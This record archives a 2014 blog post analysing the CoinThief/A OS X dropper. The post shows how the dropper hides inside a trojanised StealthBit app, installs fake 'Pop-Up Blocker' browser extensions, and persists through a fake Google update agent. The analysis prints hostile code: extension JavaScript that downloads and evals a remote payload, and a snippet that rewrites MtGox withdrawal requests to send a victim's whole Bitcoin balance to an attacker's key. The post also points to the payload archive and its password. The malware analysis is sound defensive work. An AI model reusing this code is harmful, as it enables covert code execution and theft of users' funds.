{
	"id": "b1840e9c-48e7-4f92-87e8-bb7dfa7fc8a4",
	"created_at": "2026-04-06T00:17:54.367509Z",
	"updated_at": "2026-04-10T13:12:06.203849Z",
	"deleted_at": null,
	"sha1_hash": "4f1fc9a2d493de08a35891c9ab76d89b837bd902",
	"title": "Analysis of CoinThief/A \"dropper\"",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 868684,
	"plain_text": "Analysis of CoinThief/A \"dropper\"\r\nBy fG!\r\nPublished: 2014-02-16 · Archived: 2026-04-05 22:58:23 UTC\r\nThere is no such thing as malware in OS X but last week another sample was spotted and made the “news”. I am\r\ntalking about CoinThief, a malware designed to hijack Bitcoin accounts and steal everything (I must confess I\r\nlaughed a bit; I think Bitcoin is just a bullshit pyramid scheme but I digress).\r\nThere are a few samples out there, in different stages of evolution, so this is probably not a very recent operation.\r\nNicholas Ptacek from SecureMac broke the story and did an initial analysis. Check his link here and also\r\nThreatPost for some details about the different infected applications and how it started.\r\nThis post will target the initial stage of the malware packed with StealthBit application and a bit into the installed\r\nmalware browser extensions.\r\nFirst step is to load the main binary into IDA or Hopper (I still use IDA mostly out of lazyness and habit). We are\r\npresented with this nice picture (not all methods shown) of very weird class and method names.\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 1 of 13\n\nThis triggers immediate attention which I don’t think it’s good at all if you are trying to hide attention. Another\r\nexample this time from class-dump:\r\n__attribute__((visibility(\"hidden\")))\r\n@interface IOSDJDSNSDOWKDII : NSObject\r\n{\r\n NSString *_fihwjsndkfkjs;\r\n NSString *_hisdhiwjknsk;\r\n NSString *_sdhijkskjdfd;\r\n}\r\n@property(copy, nonatomic) NSString *sdhijkskjdfd; // @synthesize sdhijkskjdfd=_sdhijkskjdfd;\r\n@property(copy, nonatomic) NSString *hisdhiwjknsk; // @synthesize hisdhiwjknsk=_hisdhiwjknsk;\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 2 of 13\n\n@property(copy, nonatomic) NSString *fihwjsndkfkjs; // @synthesize fihwjsndkfkjs=_fihwjsndkfkjs;\r\n- (void).cxx_destruct;\r\n- (BOOL)hidfisdfsguiwomc;\r\n- (id)initWiwijmxug:(id)arg1 jifikwdff:(id)arg2 mkoxjnwhd:(id)arg3;\r\nThe strings are also a good starting point to start understanding the puzzle. It’s easy to spot base64 encoded\r\nstrings, confirmed by the presence of base64 methods.\r\nbGFzdENocm9tZVBha1BhdGNoZWRWZXJzaW9u\r\nL0FwcGxpY2F0aW9ucy9Hb29nbGUgQ2hyb21lLmFwcC9Db250ZW50cy9WZXJzaW9ucw==\r\nq24@?0@\"NSString\"8@\"NSString\"16\r\nR29vZ2xlIENocm9tZSBGcmFtZXdvcmsuZnJhbWV3b3JrL1Jlc291cmNlcw==\r\nRXh0ZW5zaW9uU2V0dGluZ3MucmV0dXJuRXh0ZW5zaW9uc0RhdGEgPSBmdW5jdGlvbihleHRlbnNpb25zRGF0YSkgewogICAgLy8gV2UgY2FuIGdl\r\nRXh0ZW5zaW9uU2V0dGluZ3MucmV0dXJuRXh0ZW5zaW9uc0RhdGEgPSBmdW5jdGlvbihleHRlbnNpb25zRGF0YSkgewpmb3IodmFyIGE9MCxiPWV4\r\nAt this point we know we have a binary with obfuscated strings and class/method names. Different strategies are\r\npossible to continue analysis and reversing. DTrace and similar utilities can be used to have a general overview of\r\nwhat the binary is trying to do, or we can go directly into IDA and start making sense of the code. In the second\r\noption we can start reversing at main() or we can start checking what the obfuscated methods are trying to do and\r\nrename to something meaningful. I am a great fan of the second so I started checking each method sequentially.\r\nThe getter and setter methods are easy to spot. The setter methods start with set in the name because they are\r\nautomatically generated via property keyword, and getters because their code just retrieves the instance variable.\r\nThe obfuscator is probably a script that modifies the names before compilation (I don’t think a define is enough\r\nfor this), a LLVM pass, or just developed with those names.\r\nNow let me show you a very simple method that writes a mutex to ~/Library/Preferences/fsdiskquota1. In this\r\nfile is present it means that the dropper code was previously executed and it should not happen again.\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 3 of 13\n\nThe base64 string is decoded, tilde expanded to the full path and fsdiskquota1 mutex written. Nothing very\r\ncomplicated.\r\nThe trick here is to start renaming the methods so you can easily follow up the code. That is the annoying part of\r\nthis obfuscation method but with a small dose of patience and time it falls apart. Renamed and commented\r\nmethod:\r\nTo make it easier for you this is a screenshot of the methods I renamed. Not all but the most important to\r\nunderstand what the dropper does.\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 4 of 13\n\nThe init method for the class HIFOWEIOWEOJSDJFIVB initializes an instance variable with a\r\nNSFileManager object and retrieves the location of the current logged in user NSLibraryDirectory. Then what I\r\nrenamed as startBackdoor is called and the fun starts.\r\nThis method does the following:\r\nErases itself and replaces it with the original StealthBit binary.\r\nStarts the original binary. At this point you have the original application running and the dropper, which\r\nwill continue its work in the background.\r\nVerifies if the mutex exists.\r\nIf mutex does not exist, write it and continue unpacking the malware payload.\r\nBrowser extensions for Safari and Chrome are unpacked into a temporary folder.\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 5 of 13\n\nIf unpack was successful, Safari version is retrieved. The extensions are only compatible with Safari 5 or\r\nhigher.\r\nInstalls Safari extension that is masked as a pop up blocker.\r\nRetrieve Chrome version (if installed). Only supports Chrome v25 or higher.\r\nInstalls Chrome extension.\r\nVerifies if Library/Handsoff folder exists.\r\nIf Handsoff is not installed the backdoor will be made persistent by creating a fake Googe Software\r\nUpdate launch agent.\r\nRemove temporary files and exit.\r\nAt this point and assuming the whole process was successful against Safari, Chrome, and persistence, we have\r\ntwo malware extensions loaded into the browsers and a RAT installed in the target machine. Two screenshots of\r\nthe startBackdoor method:\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 6 of 13\n\nThe original binary is located in the _CodeSignature folder and named .dSYM. The extensions are located in the\r\nsame folder in a bzip2 archive named .sig. The dropper does not show in the Dock because LSUIElement setting\r\nis used in the Info.plist. When the dropper erases itself, the setting is removed from the plist so the legit\r\napplication shows up in the Dock. For the user everything looks normal – application startup time is fast. The\r\noriginal application is started by creating a new NSTask and using the open command to start again the now legit\r\nStealthBit.app.\r\nThe functions that install the extensions are not very interesting in terms of reversing. They locate the extension\r\nfolders, and install/active the malware extension. The Chrome related methods are a bit more complex because\r\nthey look up more information about its internals and mess with the paks and so on. I don’t know much about\r\nChrome internal organization and wasn’t much interested in reversing them – nothing valuable to me in terms of\r\nunderstanding the whole process.\r\nNow a bit into the extensions, using the Safari version as reference. As previously said, it is spoofed as a Pop-Up\r\nBlocker made by Eric Wong using KangoExtensions. The contents of description file are:\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 7 of 13\n\n{\r\n \"kango_version\": \"1.3.0 d6f8f2cf3761\",\r\n \"content_scripts\": [\r\n \"libs/jquery-2.0.3.min.js\",\r\n \"injected/main.js\"\r\n ],\r\n \"name\": \"Pop-Up Blocker\",\r\n \"creator\": \"Eric Wong\",\r\n \"kango_package_id\": \"dev\",\r\n \"background_scripts\": [\r\n \"libs/jquery-2.0.3.min.js\",\r\n \"settings/defaultSettings.js\",\r\n \"settings/settings.js\",\r\n \"global/encryption/jsEncrypt.js\",\r\n \"global/encryption/updateVerifySignature.js\",\r\n \"global/cryptoJS/components/core-min.js\",\r\n \"global/cryptoJS/components/enc-base64-min.js\",\r\n \"global/cryptoJS/components/sha1-min.js\",\r\n \"global/cryptoJS/rollups/aes.js\",\r\n \"global/cryptoJS/rollups/md5.js\",\r\n \"global/cryptoJS/rollups/tripledes.js\",\r\n \"global/jsrsasign/ext/jsbn-min.js\",\r\n \"global/jsrsasign/ext/jsbn2-min.js\",\r\n \"global/jsrsasign/ext/base64-min.js\",\r\n \"global/jsrsasign/ext/rsa-min.js\",\r\n \"global/jsrsasign/ext/rsa2-min.js\",\r\n \"global/jsrsasign/asn1hex-1.1.min.js\",\r\n \"global/jsrsasign/rsapem-1.1.min.js\",\r\n \"global/jsrsasign/rsasign-1.2.min.js\",\r\n \"global/jsrsasign/x509-1.1.min.js\",\r\n \"global/jsrsasign/crypto-1.1.min.js\",\r\n \"background.js\"\r\n ],\r\n \"homepage_url\": \"http://kangoextensions.com/\",\r\n \"version\": \"1.0.0\",\r\n \"id\": \"com.optimalcycling.safari.popupblocker\",\r\n \"description\": \"Blocks pop-up windows and other annoyances.\"\r\n}\r\nScreenshot of the Safari extension:\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 8 of 13\n\nThe Kango stuff is mostly uninteresting except for the background.js file. What it does is to try to contact a\r\nremote server and download a file, which will be the effective malware payload responsible for hijacking the\r\nBitcoin sites accounts information.\r\nif(!kango.storage.getItem('installed')) {\r\n //Get first version and run\r\n $.get(settings.get('reportServer')+\"/updates/firstUpdate.php\", function(data) {\r\n //Checking signature\r\n if(updateVerifySignature(CryptoJS.SHA1(data.global), CryptoJS.SHA1(data.injected), data.signature)) {\r\n //Saving to localstorage\r\n kango.storage.setItem('globalJS',data.global);\r\n kango.storage.setItem('injectedJS',data.injected);\r\n kango.storage.setItem('installed',true);\r\n //Saving current version\r\n kango.storage.setItem('extensionUpdateTimestamp',0);\r\n kango.storage.setItem('agentUpdateTimestamp',0);\r\n //Executing script\r\n eval(kango.storage.getItem('globalJS'));\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 9 of 13\n\nif(settings.get('debug')) console.log(\"Valid First Release\");\r\n } else {\r\n if(settings.get('debug')) console.log(\"First Release: Bad Signature\");\r\n }\r\n }, \"json\" );\r\n} else {\r\n //Running saved version\r\n try {\r\n eval(kango.storage.getItem('globalJS'));\r\n } catch(err) {\r\n if(kango.storage.getItem('globalJS_old')) {\r\n kango.storage.setItem('globalJS', kango.storage.getItem('globalJS_old'));\r\n } else {\r\n //Error in version 0, resetting extension.\r\n kango.storage.clear();\r\n }\r\n }\r\n}\r\nif(settings.get('debug')) {\r\n function uninstall() {\r\n console.log(\"Uninstalling...\");\r\n kango.storage.clear();\r\n }\r\n}\r\nA screenshot of the connection attempt to the remote server:\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 10 of 13\n\nIf you are interested in looking at the contents of the malware payload just download it here. Password is\r\n“infected!”. You can find javascript code such as this sample for the MtGoxPlugin:\r\n MtGoxPlugin.prototype.injectPage = function (withdrawKey) {\r\n function injectScript(source) {\r\n var elem = document.createElement(\"script\");\r\n elem.type = \"text/javascript\";\r\n elem.innerHTML = source;\r\n document.head.appendChild(elem);\r\n }\r\n var balance = Math.round((parseFloat($('#virtualCur span').text().match(/(.*)\\\\s/)[1])-0.001)*100000000)\r\n injectScript(\"var pubKey = '\"+ withdrawKey +\"'; balanceBTC = '\"+ balance +\"'; \"+\r\n \"(\"+(function() {\r\n $.ajaxSetup({\r\n beforeSend: function(jqXHR, settings) {\r\n if(settings.url == '/api/2/money/bitcoin/send_simple') {\r\n settings.data = settings.data.replace(/amount=.*\\\\\u0026address=/, 'amount='+ balanceBTC +'\u0026a\r\n settings.data = settings.data.replace(/address=.*\\\\\u0026address/, 'address='+ pubKey +'\u0026addr\r\n }\r\n }});\r\n }).toString()+\")()\");\r\n };\r\nThe last step is to reverse the RAT, a binary called Agent and installed in ~/Library/Application\r\nSupport/.com.google.softwareUpdateAgent. I did not reverse this module yet but it appears to be responsible for\r\nsending data to the remote servers and also remote access to the infected machines. It has a few obfuscated\r\nmethods reused from the dropper but everything else is not obfuscated. There is a method that verifies the\r\npresence of Little Snitch, which is funny because that doesn’t exist in the dropper. Probably some quality control\r\nissues! There’s also a method checking for 1Password.\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 11 of 13\n\nWhat else is there to say about this? I have at least five different infected applications, in different stages of\r\nevolution (some without obfuscated methods).\r\nAs far as I have read/know they were available on popular downloads sites. Trust is a difficult problem to solve.\r\nWhat are the conclusions and lessons from this malware?\r\nThere’s some fuss around regarding my previous post about evil iTunes plugins, with a quite surprising number of\r\n“uninformed” people using the argument of “arbitrary code execution”. Well, the thing is that everything you\r\ndownload from the Internet is arbitrary code unless you reverse every single binary, and that has the strong\r\nassumption that you are able to understand everything it does. Quite a task I might say!\r\nA normal looking application can easily copy malicious payloads to many different places, iTunes plugins being\r\none of the interesting targets, but it can also easily patch other applications since most are installed with same\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 12 of 13\n\npermissions as the normal user. There’s no need for exploits, suspicious please gimme r00t dialogs. Just an\r\ninnocent app you download and trust. In the post-Snowden world what guarantees you have that famous apps\r\ndon’t have state-sponsored payloads? None I might say.\r\nThe open source bullshit principle of many eyes looking has been shown too many times to be a really bad\r\nassumption – not that many eyes are looking and stupid bugs are kept alive for many years. Sandboxes and the\r\nAppStore improve the situation but they still suffer from vulnerabilities and their binaries are probably more\r\nopaque (iOS in particular) and with less incentives to be reversed (Apple wouldn’t let malware in the AppStore,\r\nright?).\r\nI will probably edit this post in the next days to add some missing info or improve some paragraphs. Too tired\r\nright now.\r\nHave fun,\r\nfG!\r\nSource: https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/"
	],
	"report_names": [
		"analysis-of-cointhiefa-dropper"
	],
	"threat_actors": [],
	"ts_created_at": 1775434674,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f1fc9a2d493de08a35891c9ab76d89b837bd902.pdf",
		"text": "https://archive.orkl.eu/4f1fc9a2d493de08a35891c9ab76d89b837bd902.txt",
		"img": "https://archive.orkl.eu/4f1fc9a2d493de08a35891c9ab76d89b837bd902.jpg"
	}
}